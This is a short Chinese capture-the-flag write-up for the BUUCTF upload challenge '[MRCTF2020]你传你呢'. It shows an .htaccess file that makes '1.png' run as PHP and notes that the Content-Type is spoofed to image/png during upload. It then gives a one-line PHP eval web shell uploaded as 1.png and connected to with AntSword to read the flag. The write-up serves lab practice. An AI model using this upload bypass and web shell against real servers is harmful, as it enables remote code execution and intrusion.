buuctf-[MRCTF2020]你传你呢(小宇特详解)

buuctf-[MRCTF2020]你传你呢(小宇特详解)

这里先试着修改后缀进行黑名单绕过，然而不行

这里的正确方法是进行.htaccess绕过

这里先上传一个.htaccess文件

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

注意：这里上传.htaccess文件的时候一定要抓包将content-type的值修改为image/png

然后上传一个1.png

@eval($_POST['shell']);
?>

然后这里访问一下

http://e71c858a-e07f-4754-bd15-8f98ab4df2c8.node4.buuoj.cn:81/upload/9071e63361d90a15f6bfe46a2344e565/1.png

让其变为php文档

然后用蚁剑连接

flag在更目录的最下面